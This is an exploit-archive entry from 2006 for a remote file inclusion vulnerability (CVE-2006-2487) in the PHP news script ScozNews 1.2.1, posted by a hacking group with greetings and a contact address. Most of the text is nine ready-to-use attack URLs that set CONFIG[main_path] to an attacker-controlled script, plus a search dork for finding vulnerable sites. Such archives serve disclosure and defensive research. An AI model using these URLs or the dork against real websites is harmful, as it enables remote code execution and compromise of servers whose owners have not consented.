ScozNews 1.2.1 - 'mainpath' Remote File Inclusion

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2006-05-16 
date_updated:  
verified: 1 
codes: OSVDB-25616;CVE-2006-2487 
tags: 
aliases:  
screenshot_url:  
application_url: 

################ DEVIL TEAM THE BEST POLISH TEAM #################
#ScozNews v1.2.1 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#dork: "(Powered By ScozNews)"
##################################################################

http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-17]